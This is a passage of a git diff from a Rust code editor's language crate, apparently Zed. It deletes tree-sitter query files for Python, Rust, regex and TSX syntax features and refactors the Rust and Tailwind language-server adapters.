@_pytest_method_name - (#match? @_pytest_method_name "^test_") - ) @_python-pytest-method - ) - (#set! tag python-pytest-method) - ) - -; decorated pytest functions -( - (module - (decorated_definition - (decorator)+ @_decorator - definition: (function_definition - name: (identifier) @run @_pytest_method_name - (#match? @_pytest_method_name "^test_") - ) - ) @_python-pytest-method - ) - (#set! tag python-pytest-method) - ) - - -; pytest classes -( - (module - (class_definition - name: (identifier) @run @_pytest_class_name - (#match? @_pytest_class_name "^Test") - ) - (#set! 
tag python-pytest-class) - ) - ) - - -; decorated pytest classes -( - (module - (decorated_definition - (decorator)+ @_decorator - definition: (class_definition - name: (identifier) @run @_pytest_class_name - (#match? @_pytest_class_name "^Test") - ) - ) - (#set! tag python-pytest-class) - ) - ) - - -; pytest class methods -( - (module - (class_definition - name: (identifier) @_pytest_class_name - (#match? @_pytest_class_name "^Test") - body: (block - [(decorated_definition - (decorator)+ @_decorator - definition: (function_definition - name: (identifier) @run @_pytest_method_name - (#match? @_pytest_method_name "^test_") - ) - ) - (function_definition - name: (identifier) @run @_pytest_method_name - (#match? @_pytest_method_name "^test") - ) - ] @_python-pytest-method) - (#set! tag python-pytest-method) - ) - ) - ) - -; decorated pytest class methods -( - (module - (decorated_definition - (decorator)+ @_decorator - definition: (class_definition - name: (identifier) @_pytest_class_name - (#match? @_pytest_class_name "^Test") - body: (block - [(decorated_definition - (decorator)+ @_decorator - definition: (function_definition - name: (identifier) @run @_pytest_method_name - (#match? @_pytest_method_name "^test_") - ) - ) - (function_definition - name: (identifier) @run @_pytest_method_name - (#match? @_pytest_method_name "^test") - ) - ] @_python-pytest-method) - (#set! tag python-pytest-method) - ) - ) - ) - ) - -; module main method -( - (module - (if_statement - condition: (comparison_operator - (identifier) @run @_lhs - operators: "==" - (string) @_rhs - ) - (#eq? @_lhs "__name__") - (#match? @_rhs "^[\"']__main__[\"']$") - (#set! 
tag python-module-main-method) - ) - ) - ) diff --git a/crates/languages/src/regex/brackets.scm b/crates/languages/src/regex/brackets.scm deleted file mode 100644 index 191fd9c084a52eced37428281971ff9e569a4932..0000000000000000000000000000000000000000 --- a/crates/languages/src/regex/brackets.scm +++ /dev/null @@ -1,3 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) diff --git a/crates/languages/src/rust.rs b/crates/languages/src/rust.rs index e463a6c62dd6a0625c8ee7c6d314b296b881157e..d92c1392c128ed72b6e2972bc54dcf7dfc152b1e 100644 --- a/crates/languages/src/rust.rs +++ b/crates/languages/src/rust.rs @@ -3,7 +3,7 @@ use async_trait::async_trait; use collections::HashMap; use futures::StreamExt; use futures::lock::OwnedMutexGuard; -use gpui::{App, AppContext, AsyncApp, SharedString, Task}; +use gpui::{App, AppContext, AsyncApp, Entity, SharedString, Task}; use http_client::github::AssetKind; use http_client::github::{GitHubLspBinaryVersion, latest_github_release}; use http_client::github_download::{GithubBinaryMetadata, download_server_binary}; @@ -31,11 +31,10 @@ use util::merge_json_value_into; use util::rel_path::RelPath; use util::{ResultExt, maybe}; -use crate::LanguageDir; -use crate::language_settings::language_settings; +use crate::language_settings::LanguageSettings; pub(crate) fn semantic_token_rules() -> SemanticTokenRules { - let content = LanguageDir::get("rust/semantic_token_rules.json") + let content = grammars::get_file("rust/semantic_token_rules.json") .expect("missing rust/semantic_token_rules.json"); let json = std::str::from_utf8(&content.data).expect("invalid utf-8 in semantic_token_rules"); settings::parse_json_with_comments::(json) @@ -202,6 +201,7 @@ impl RustLspAdapter { async fn build_asset_name() -> String { let extension = match Self::GITHUB_ASSET_KIND { AssetKind::TarGz => "tar.gz", + AssetKind::TarBz2 => "tar.bz2", AssetKind::Gz => "gz", AssetKind::Zip => "zip", }; @@ -262,12 +262,7 @@ impl LspAdapter for 
RustLspAdapter { Some("rust-analyzer/flycheck".into()) } - fn process_diagnostics( - &self, - params: &mut lsp::PublishDiagnosticsParams, - _: LanguageServerId, - _: Option<&'_ Buffer>, - ) { + fn process_diagnostics(&self, params: &mut lsp::PublishDiagnosticsParams, _: LanguageServerId) { static REGEX: LazyLock = LazyLock::new(|| Regex::new(r"(?m)`([^`]+)\n`$").expect("Failed to create REGEX")); @@ -706,7 +701,7 @@ impl LspInstaller for RustLspAdapter { } = version; let destination_path = container_dir.join(format!("rust-analyzer-{name}")); let server_path = match Self::GITHUB_ASSET_KIND { - AssetKind::TarGz | AssetKind::Gz => destination_path.clone(), // Tar and gzip extract in place. + AssetKind::TarGz | AssetKind::TarBz2 | AssetKind::Gz => destination_path.clone(), // Tar and gzip extract in place. AssetKind::Zip => destination_path.clone().join("rust-analyzer.exe"), // zip contains a .exe }; @@ -898,23 +893,16 @@ impl ContextProvider for RustContextProvider { fn associated_tasks( &self, - file: Option>, + buffer: Option>, cx: &App, ) -> Task> { const DEFAULT_RUN_NAME_STR: &str = "RUST_DEFAULT_PACKAGE_RUN"; const CUSTOM_TARGET_DIR: &str = "RUST_TARGET_DIR"; - let language_sets = language_settings(Some("Rust".into()), file.as_ref(), cx); - let package_to_run = language_sets - .tasks - .variables - .get(DEFAULT_RUN_NAME_STR) - .cloned(); - let custom_target_dir = language_sets - .tasks - .variables - .get(CUSTOM_TARGET_DIR) - .cloned(); + let language = LanguageName::new_static("Rust"); + let settings = LanguageSettings::resolve(buffer.map(|b| b.read(cx)), Some(&language), cx); + let package_to_run = settings.tasks.variables.get(DEFAULT_RUN_NAME_STR).cloned(); + let custom_target_dir = settings.tasks.variables.get(CUSTOM_TARGET_DIR).cloned(); let run_task_args = if let Some(package_to_run) = package_to_run { vec!["run".into(), "-p".into(), package_to_run] } else { @@ -1280,8 +1268,8 @@ async fn get_cached_server_binary(container_dir: PathBuf) -> Option return 
Ok(None), }; let path = match RustLspAdapter::GITHUB_ASSET_KIND { - AssetKind::TarGz | AssetKind::Gz => path, // Tar and gzip extract in place. - AssetKind::Zip => path.join("rust-analyzer.exe"), // zip contains a .exe + AssetKind::TarGz | AssetKind::TarBz2 | AssetKind::Gz => path, // Tar and gzip extract in place. + AssetKind::Zip => path.join("rust-analyzer.exe"), // zip contains a .exe }; anyhow::Ok(Some(LanguageServerBinary { @@ -1364,7 +1352,7 @@ mod tests { }, ], }; - RustLspAdapter.process_diagnostics(&mut params, LanguageServerId(0), None); + RustLspAdapter.process_diagnostics(&mut params, LanguageServerId(0)); assert_eq!(params.diagnostics[0].message, "use of moved value `a`"); @@ -1554,10 +1542,10 @@ mod tests { "await.as_deref_mut(&mut self) -> IterMut<'_, T>".to_string(), 6..18, vec![ - (6..18, HighlightId(2)), - (20..23, HighlightId(1)), - (33..40, HighlightId(0)), - (45..46, HighlightId(0)) + (6..18, HighlightId::new(2)), + (20..23, HighlightId::new(1)), + (33..40, HighlightId::new(0)), + (45..46, HighlightId::new(0)) ], )) ); @@ -1584,12 +1572,12 @@ mod tests { "pub fn as_deref_mut(&mut self) -> IterMut<'_, T>".to_string(), 7..19, vec![ - (0..3, HighlightId(1)), - (4..6, HighlightId(1)), - (7..19, HighlightId(2)), - (21..24, HighlightId(1)), - (34..41, HighlightId(0)), - (46..47, HighlightId(0)) + (0..3, HighlightId::new(1)), + (4..6, HighlightId::new(1)), + (7..19, HighlightId::new(2)), + (21..24, HighlightId::new(1)), + (34..41, HighlightId::new(0)), + (46..47, HighlightId::new(0)) ], )) ); @@ -1610,7 +1598,7 @@ mod tests { Some(CodeLabel::new( "inner_value: String".to_string(), 6..11, - vec![(0..11, HighlightId(3)), (13..19, HighlightId(0))], + vec![(0..11, HighlightId::new(3)), (13..19, HighlightId::new(0))], )) ); @@ -1637,8 +1625,8 @@ mod tests { vec![ (10..13, HighlightId::TABSTOP_INSERT_ID), (16..19, HighlightId::TABSTOP_INSERT_ID), - (0..7, HighlightId(2)), - (7..8, HighlightId(2)), + (0..7, HighlightId::new(2)), + (7..8, 
HighlightId::new(2)), ], )) ); @@ -1665,8 +1653,8 @@ mod tests { 0..4, vec![ (5..9, HighlightId::TABSTOP_REPLACE_ID), - (0..3, HighlightId(2)), - (3..4, HighlightId(2)), + (0..3, HighlightId::new(2)), + (3..4, HighlightId::new(2)), ], )) ); @@ -1694,8 +1682,8 @@ mod tests { vec![ (7..10, HighlightId::TABSTOP_REPLACE_ID), (13..16, HighlightId::TABSTOP_INSERT_ID), - (0..2, HighlightId(1)), - (3..6, HighlightId(1)), + (0..2, HighlightId::new(1)), + (3..6, HighlightId::new(1)), ], )) ); @@ -1723,8 +1711,8 @@ mod tests { vec![ (4..8, HighlightId::TABSTOP_REPLACE_ID), (12..16, HighlightId::TABSTOP_REPLACE_ID), - (0..3, HighlightId(1)), - (9..11, HighlightId(1)), + (0..3, HighlightId::new(1)), + (9..11, HighlightId::new(1)), ], )) ); diff --git a/crates/languages/src/rust/brackets.scm b/crates/languages/src/rust/brackets.scm deleted file mode 100644 index 7a35adb10021c83b8e08e888187ab133c5313ad9..0000000000000000000000000000000000000000 --- a/crates/languages/src/rust/brackets.scm +++ /dev/null @@ -1,7 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) -("<" @open ">" @close) -(closure_parameters "|" @open "|" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("'" @open "'" @close) (#set! 
rainbow.exclude)) diff --git a/crates/languages/src/rust/debugger.scm b/crates/languages/src/rust/debugger.scm deleted file mode 100644 index 5347413f698083287b9bedd25f4732d24fbbf76e..0000000000000000000000000000000000000000 --- a/crates/languages/src/rust/debugger.scm +++ /dev/null @@ -1,50 +0,0 @@ -(metavariable) @debug-variable - -(parameter (identifier) @debug-variable) - -(self) @debug-variable - -(static_item (identifier) @debug-variable) -(const_item (identifier) @debug-variable) - -(let_declaration pattern: (identifier) @debug-variable) - -(let_condition (identifier) @debug-variable) - -(match_arm (identifier) @debug-variable) - -(for_expression (identifier) @debug-variable) - -(closure_parameters (identifier) @debug-variable) - -(assignment_expression (identifier) @debug-variable) - -(field_expression (identifier) @debug-variable) - -(binary_expression (identifier) @debug-variable - (#not-match? @debug-variable "^[A-Z]")) - -(reference_expression (identifier) @debug-variable - (#not-match? @debug-variable "^[A-Z]")) - -(array_expression (identifier) @debug-variable) -(tuple_expression (identifier) @debug-variable) -(return_expression (identifier) @debug-variable) -(await_expression (identifier) @debug-variable) -(try_expression (identifier) @debug-variable) -(index_expression (identifier) @debug-variable) -(range_expression (identifier) @debug-variable) -(unary_expression (identifier) @debug-variable) - -(if_expression (identifier) @debug-variable) -(while_expression (identifier) @debug-variable) - -(parenthesized_expression (identifier) @debug-variable) - -(arguments (identifier) @debug-variable - (#not-match? @debug-variable "^[A-Z]")) - -(macro_invocation (token_tree (identifier) @debug-variable - (#not-match? 
@debug-variable "^[A-Z]"))) - -(block) @debug-scope diff --git a/crates/languages/src/rust/imports.scm b/crates/languages/src/rust/imports.scm deleted file mode 100644 index 3ce6a4f073506dd4d27320a7fd5bb547927f9c1a..0000000000000000000000000000000000000000 --- a/crates/languages/src/rust/imports.scm +++ /dev/null @@ -1,27 +0,0 @@ -(use_declaration) @import - -(scoped_use_list - path: (_) @namespace - list: (_) @list) - -(scoped_identifier - path: (_) @namespace - name: (identifier) @name) - -(use_list (identifier) @name) - -(use_declaration (identifier) @name) - -(use_as_clause - path: (scoped_identifier - path: (_) @namespace - name: (_) @name) - alias: (_) @alias) - -(use_as_clause - path: (identifier) @name - alias: (_) @alias) - -(use_wildcard - (_)? @namespace - "*" @wildcard) diff --git a/crates/languages/src/rust/indents.scm b/crates/languages/src/rust/indents.scm deleted file mode 100644 index 9ab6b029083fd5d8e3249916c00a5f90648eb3e2..0000000000000000000000000000000000000000 --- a/crates/languages/src/rust/indents.scm +++ /dev/null @@ -1,14 +0,0 @@ -[ - ((where_clause) _ @end) - (field_expression) - (call_expression) - (assignment_expression) - (let_declaration) - (let_chain) - (await_expression) -] @indent - -(_ "[" "]" @end) @indent -(_ "<" ">" @end) @indent -(_ "{" "}" @end) @indent -(_ "(" ")" @end) @indent diff --git a/crates/languages/src/rust/injections.scm b/crates/languages/src/rust/injections.scm deleted file mode 100644 index 88df78d793c5666492b0f3917d78b4210be5e094..0000000000000000000000000000000000000000 --- a/crates/languages/src/rust/injections.scm +++ /dev/null @@ -1,64 +0,0 @@ -([ - (line_comment) - (block_comment) -] @injection.content - (#set! injection.language "comment")) - -(macro_invocation - macro: [ - ((identifier) @_macro_name) - (scoped_identifier (identifier) @_macro_name .) - ] - (#not-any-of? @_macro_name "view" "html") - (token_tree) @injection.content - (#set! 
injection.language "rust")) - -; we need a better way for the leptos extension to declare that -; it wants to inject inside of rust, instead of modifying the rust -; injections to support leptos injections -(macro_invocation - macro: [ - ((identifier) @_macro_name) - (scoped_identifier (identifier) @_macro_name .) - ] - (#any-of? @_macro_name "view" "html") - (token_tree) @injection.content - (#set! injection.language "rstml") - ) - -(macro_invocation - macro: [ - ((identifier) @_macro_name) - (scoped_identifier (identifier) @_macro_name .) - ] - (#any-of? @_macro_name "sql") - (_) @injection.content - (#set! injection.language "sql") - ) - -; lazy_regex -(macro_invocation - macro: [ - ((identifier) @_macro_name) - (scoped_identifier (identifier) @_macro_name .) - ] - (token_tree [ - (string_literal (string_content) @injection.content) - (raw_string_literal (string_content) @injection.content) - ]) - (#set! injection.language "regex") - (#any-of? @_macro_name "regex" "bytes_regex") -) - -(call_expression - function: (scoped_identifier) @_fn_path - arguments: (arguments - [ - (string_literal (string_content) @injection.content) - (raw_string_literal (string_content) @injection.content) - ] - ) - - (#match? @_fn_path ".*Regex(Builder)?::new") - (#set! injection.language "regex") -) diff --git a/crates/languages/src/rust/outline.scm b/crates/languages/src/rust/outline.scm deleted file mode 100644 index a99f53dd2b3154aa3717f67fd683da4a8b57d31b..0000000000000000000000000000000000000000 --- a/crates/languages/src/rust/outline.scm +++ /dev/null @@ -1,73 +0,0 @@ -(attribute_item) @annotation -(line_comment) @annotation - -(struct_item - (visibility_modifier)? @context - "struct" @context - name: (_) @name) @item - -(enum_item - (visibility_modifier)? @context - "enum" @context - name: (_) @name) @item - -(enum_variant - (visibility_modifier)? @context - name: (_) @name) @item - -(impl_item - "impl" @context - trait: (_)? @name - "for"? 
@context - type: (_) @name - body: (_ . "{" @open "}" @close .)) @item - -(trait_item - (visibility_modifier)? @context - "trait" @context - name: (_) @name) @item - -(function_item - (visibility_modifier)? @context - (function_modifiers)? @context - "fn" @context - name: (_) @name - body: (_ . "{" @open "}" @close .)) @item - -(function_signature_item - (visibility_modifier)? @context - (function_modifiers)? @context - "fn" @context - name: (_) @name) @item - -(macro_definition - . "macro_rules!" @context - name: (_) @name) @item - -(mod_item - (visibility_modifier)? @context - "mod" @context - name: (_) @name) @item - -(type_item - (visibility_modifier)? @context - "type" @context - name: (_) @name) @item - -(associated_type - "type" @context - name: (_) @name) @item - -(const_item - (visibility_modifier)? @context - "const" @context - name: (_) @name) @item - -(static_item - (visibility_modifier)? @context - "static" @context - name: (_) @name) @item - -(field_declaration - (visibility_modifier)? @context - name: (_) @name) @item diff --git a/crates/languages/src/rust/runnables.scm b/crates/languages/src/rust/runnables.scm deleted file mode 100644 index 7c1571614424161ec866f5fa2607ea55975500e2..0000000000000000000000000000000000000000 --- a/crates/languages/src/rust/runnables.scm +++ /dev/null @@ -1,92 +0,0 @@ -; Rust mod test -( - (attribute_item (attribute - ( - (identifier) @_attribute) - arguments: ( - (token_tree (identifier) @_test) - (#eq? @_test "test") - ) - ) - (#eq? @_attribute "cfg") - ) - . - (mod_item - name: (_) @run - ) - (#set! tag rust-mod-test) -) - -; Rust test -( - ( - (attribute_item (attribute - [((identifier) @_attribute) - (scoped_identifier (identifier) @_attribute) - ]) - (#match? @_attribute "test") - ) @_start - . - (attribute_item) * - . - [(line_comment) (block_comment)] * - . - (function_item - name: (_) @run @_test_name - body: _ - ) @_end - ) - (#set! 
tag rust-test) -) - -; Rust doc test -( - ( - (line_comment) * - (line_comment - doc: (_) @_comment_content - ) @_start @run - (#match? @_comment_content "```") - . - (line_comment) * - . - (line_comment - doc: (_) @_end_comment_content - ) @_end_code_block - (#match? @_end_comment_content "```") - . - (line_comment) * - (attribute_item) * - . - [(function_item - name: (_) @_doc_test_name - body: _ - ) (function_signature_item - name: (_) @_doc_test_name - ) (struct_item - name: (_) @_doc_test_name - ) (enum_item - name: (_) @_doc_test_name - body: _ - ) ( - (attribute_item) ? - (macro_definition - name: (_) @_doc_test_name) - ) (mod_item - name: (_) @_doc_test_name - )] @_end - ) - (#set! tag rust-doc-test) -) - -; Rust main function -( - ( - (function_item - name: (_) @run - body: _ - ) @_rust_main_function_end - (#eq? @run "main") - ) - (#set! tag rust-main) -) diff --git a/crates/languages/src/rust/textobjects.scm b/crates/languages/src/rust/textobjects.scm deleted file mode 100644 index 4e7e7fa0cd1ba4393bc99998e38e940f751aef97..0000000000000000000000000000000000000000 --- a/crates/languages/src/rust/textobjects.scm +++ /dev/null @@ -1,51 +0,0 @@ -; functions -(function_signature_item) @function.around - -(function_item - body: (_ - "{" - (_)* @function.inside - "}" )) @function.around - -; classes -(struct_item - body: (_ - ["{" "("]? - [(_) ","?]* @class.inside - ["}" ")"]? 
)) @class.around - -(enum_item - body: (_ - "{" - [(_) ","?]* @class.inside - "}" )) @class.around - -(union_item - body: (_ - "{" - [(_) ","?]* @class.inside - "}" )) @class.around - -(trait_item - body: (_ - "{" - [(_) ","?]* @class.inside - "}" )) @class.around - -(impl_item - body: (_ - "{" - [(_) ","?]* @class.inside - "}" )) @class.around - -(mod_item - body: (_ - "{" - [(_) ","?]* @class.inside - "}" )) @class.around - -; comments - -(line_comment)+ @comment.around - -(block_comment) @comment.around diff --git a/crates/languages/src/tailwind.rs b/crates/languages/src/tailwind.rs index 72e4684ce0a0242e5381c118a9748e3d9718341d..c78790b74c81c9a7fce89425f4499d41f343189e 100644 --- a/crates/languages/src/tailwind.rs +++ b/crates/languages/src/tailwind.rs @@ -139,6 +139,7 @@ impl LspAdapter for TailwindLspAdapter { async fn initialization_options( self: Arc, _: &Arc, + _: &mut AsyncApp, ) -> Result> { Ok(Some(json!({ "provideFormatter": true, @@ -196,11 +197,8 @@ impl LspAdapter for TailwindLspAdapter { "typescriptreact".to_string(), ), (LanguageName::new_static("Svelte"), "svelte".to_string()), - ( - LanguageName::new_static("Elixir"), - "phoenix-heex".to_string(), - ), - (LanguageName::new_static("HEEX"), "phoenix-heex".to_string()), + (LanguageName::new_static("Elixir"), "elixir".to_string()), + (LanguageName::new_static("HEEx"), "heex".to_string()), (LanguageName::new_static("ERB"), "erb".to_string()), (LanguageName::new_static("HTML+ERB"), "erb".to_string()), (LanguageName::new_static("PHP"), "php".to_string()), diff --git a/crates/languages/src/tailwindcss.rs b/crates/languages/src/tailwindcss.rs index 016c2956591a5140ab4b2d8313711382fee47d30..aa310fac3f57477b9c0ef85f24f51e619a893c87 100644 --- a/crates/languages/src/tailwindcss.rs +++ b/crates/languages/src/tailwindcss.rs @@ -135,6 +135,7 @@ impl LspAdapter for TailwindCssLspAdapter { async fn initialization_options( self: Arc, _: &Arc, + _: &mut AsyncApp, ) -> Result> { Ok(Some(json!({ "provideFormatter": 
true diff --git a/crates/languages/src/tsx/brackets.scm b/crates/languages/src/tsx/brackets.scm deleted file mode 100644 index 0e98b78036b4b19fd63d812fa92d2416788764f4..0000000000000000000000000000000000000000 --- a/crates/languages/src/tsx/brackets.scm +++ /dev/null @@ -1,11 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) -("<" @open ">" @close) -("<" @open "/>" @close) -("" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("'" @open "'" @close) (#set! rainbow.exclude)) -(("`" @open "`" @close) (#set! rainbow.exclude)) - -((jsx_element (jsx_opening_element) @open (jsx_closing_element) @close) (#set! newline.only) (#set! rainbow.exclude)) diff --git a/crates/languages/src/tsx/debugger.scm b/crates/languages/src/tsx/debugger.scm deleted file mode 100644 index 3e73dc839e4e5fc5ccc1654e96b327bc8181a2e8..0000000000000000000000000000000000000000 --- a/crates/languages/src/tsx/debugger.scm +++ /dev/null @@ -1,25 +0,0 @@ -(lexical_declaration (variable_declarator name: (identifier) @debug-variable)) - -(for_in_statement left: (identifier) @debug-variable) -(for_statement initializer: (lexical_declaration (variable_declarator name: (identifier) @debug-variable))) - -(binary_expression left: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) -(binary_expression right: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(unary_expression argument: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) -(update_expression argument: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(return_statement (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(parenthesized_expression (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(jsx_expression (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(array (identifier) @debug-variable (#not-match? 
@debug-variable "^[A-Z]")) - -(pair value: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(member_expression object: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(statement_block) @debug-scope -(program) @debug-scope diff --git a/crates/languages/src/tsx/imports.scm b/crates/languages/src/tsx/imports.scm deleted file mode 100644 index e26b97aeef9cb62395e7030f3173208d79187bd6..0000000000000000000000000000000000000000 --- a/crates/languages/src/tsx/imports.scm +++ /dev/null @@ -1,14 +0,0 @@ -(import_statement - import_clause: (import_clause - [ - (identifier) @name - (named_imports - (import_specifier - name: (_) @name - alias: (_)? @alias)) - ]) - source: (string (string_fragment) @source)) @import - -(import_statement - !import_clause - source: (string (string_fragment) @source @wildcard)) @import diff --git a/crates/languages/src/tsx/indents.scm b/crates/languages/src/tsx/indents.scm deleted file mode 100644 index 9897f3060eaf37891cf4563cebc93345112422f8..0000000000000000000000000000000000000000 --- a/crates/languages/src/tsx/indents.scm +++ /dev/null @@ -1,21 +0,0 @@ -[ - (call_expression) - (assignment_expression) - (member_expression) - (lexical_declaration) - (variable_declaration) - (assignment_expression) - (if_statement) - (for_statement) -] @indent - -(_ "[" "]" @end) @indent -(_ "<" ">" @end) @indent -(_ "{" "}" @end) @indent -(_ "(" ")" @end) @indent - -(jsx_opening_element ">" @end) @indent - -(jsx_element - (jsx_opening_element) @start - (jsx_closing_element)? @end) @indent diff --git a/crates/languages/src/tsx/injections.scm b/crates/languages/src/tsx/injections.scm deleted file mode 100644 index 2cf3ea69ca2fd95402eba6fadb85f3505c5562b7..0000000000000000000000000000000000000000 --- a/crates/languages/src/tsx/injections.scm +++ /dev/null @@ -1,128 +0,0 @@ -((comment) @injection.content - (#set! injection.language "comment") -) - -(((comment) @_jsdoc_comment - (#match? 
@_jsdoc_comment "(?s)^/[*][*][^*].*[*]/$")) @injection.content - (#set! injection.language "jsdoc")) - -((regex) @injection.content - (#set! injection.language "regex")) - -(call_expression - function: (identifier) @_name (#eq? @_name "css") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "css")) -) - -(call_expression - function: (member_expression - object: (identifier) @_obj (#eq? @_obj "styled") - property: (property_identifier)) - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "css")) -) - -(call_expression - function: (call_expression - function: (identifier) @_name (#eq? @_name "styled")) - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "css")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "html") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "html")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "js") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "javascript")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "json") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "json")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "sql") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "sql")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "ts") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "typescript")) -) - -(call_expression - function: (identifier) @_name (#match? @_name "^ya?ml$") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "yaml")) -) - -(call_expression - function: (identifier) @_name (#match? 
@_name "^g(raph)?ql$") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "graphql")) -) - -(call_expression - function: (identifier) @_name (#match? @_name "^g(raph)?ql$") - arguments: (arguments (template_string (string_fragment) @injection.content - (#set! injection.language "graphql"))) -) - -(call_expression - function: (identifier) @_name(#match? @_name "^iso$") - arguments: (arguments (template_string (string_fragment) @injection.content - (#set! injection.language "isograph"))) -) - -; Parse the contents of strings and tagged template -; literals with leading ECMAScript comments: -; '/* html */' or '/*html*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*html\\s*\\*\\/") - (#set! injection.language "html") -) - -; '/* sql */' or '/*sql*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*sql\\s*\\*\\/") - (#set! injection.language "sql") -) - -; '/* gql */' or '/*gql*/' -; '/* graphql */' or '/*graphql*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*(gql|graphql)\\s*\\*\\/") - (#set! injection.language "graphql") -) - -; '/* css */' or '/*css*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*(css)\\s*\\*\\/") - (#set! 
injection.language "css") -) diff --git a/crates/languages/src/tsx/outline.scm b/crates/languages/src/tsx/outline.scm deleted file mode 100644 index 54d29007c7b7eb57c0bcaefc2c1e0ab75e4d9a6c..0000000000000000000000000000000000000000 --- a/crates/languages/src/tsx/outline.scm +++ /dev/null @@ -1,230 +0,0 @@ -(internal_module - "namespace" @context - name: (_) @name) @item - -(enum_declaration - "enum" @context - name: (_) @name) @item - -(type_alias_declaration - "type" @context - name: (_) @name) @item - -(function_declaration - "async"? @context - "function" @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item - -(generator_function_declaration - "async"? @context - "function" @context - "*" @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item - -(interface_declaration - "interface" @context - name: (_) @name) @item - -(export_statement - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (identifier) @name) @item)) - -; Exported array destructuring -(export_statement - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (array_pattern - [ - (identifier) @name @item - (assignment_pattern left: (identifier) @name @item) - (rest_pattern (identifier) @name @item) - ])))) - -; Exported object destructuring -(export_statement - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (object_pattern - [(shorthand_property_identifier_pattern) @name @item - (pair_pattern - value: (identifier) @name @item) - (pair_pattern - value: (assignment_pattern left: (identifier) @name @item)) - (rest_pattern (identifier) @name @item)])))) - -(program - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (identifier) @name) @item)) - -; Top-level array destructuring -(program - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (array_pattern - [ - (identifier) 
@name @item - (assignment_pattern left: (identifier) @name @item) - (rest_pattern (identifier) @name @item) - ])))) - -; Top-level object destructuring -(program - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (object_pattern - [(shorthand_property_identifier_pattern) @name @item - (pair_pattern - value: (identifier) @name @item) - (pair_pattern - value: (assignment_pattern left: (identifier) @name @item)) - (rest_pattern (identifier) @name @item)])))) - -(class_declaration - "class" @context - name: (_) @name) @item - -(abstract_class_declaration - "abstract" @context - "class" @context - name: (_) @name) @item - -; Method definitions in classes (not in object literals) -(class_body - (method_definition - [ - "get" - "set" - "async" - "*" - "readonly" - "static" - (override_modifier) - (accessibility_modifier) - ]* @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item) - -; Object literal methods -(variable_declarator - value: (object - (method_definition - [ - "get" - "set" - "async" - "*" - ]* @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item)) - -(public_field_definition - [ - "declare" - "readonly" - "abstract" - "static" - (accessibility_modifier) - ]* @context - name: (_) @name) @item - -; Add support for (node:test, bun:test and Jest) runnable -( - (call_expression - function: [ - (identifier) @_name - (member_expression - object: [ - (identifier) @_name - (member_expression object: (identifier) @_name) - ] - ) - ] @context - (#any-of? @_name "it" "test" "describe" "context" "suite") - arguments: ( - arguments . 
[ - (string (string_fragment) @name) - (identifier) @name - ] - ) - ) -) @item - -; Add support for parameterized tests -( - (call_expression - function: (call_expression - function: (member_expression - object: [(identifier) @_name (member_expression object: (identifier) @_name)] - property: (property_identifier) @_property - ) - (#any-of? @_name "it" "test" "describe" "context" "suite") - (#any-of? @_property "each") - ) - arguments: ( - arguments . [ - (string (string_fragment) @name) - (identifier) @name - ] - ) - ) -) @item - -; Object properties -(pair - key: [ - (property_identifier) @name - (string (string_fragment) @name) - (number) @name - (computed_property_name) @name - ]) @item - - -; Nested variables in function bodies -(statement_block - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (identifier) @name) @item)) - -; Nested array destructuring in functions -(statement_block - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (array_pattern - [ - (identifier) @name @item - (assignment_pattern left: (identifier) @name @item) - (rest_pattern (identifier) @name @item) - ])))) - -; Nested object destructuring in functions -(statement_block - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (object_pattern - [(shorthand_property_identifier_pattern) @name @item - (pair_pattern value: (identifier) @name @item) - (pair_pattern value: (assignment_pattern left: 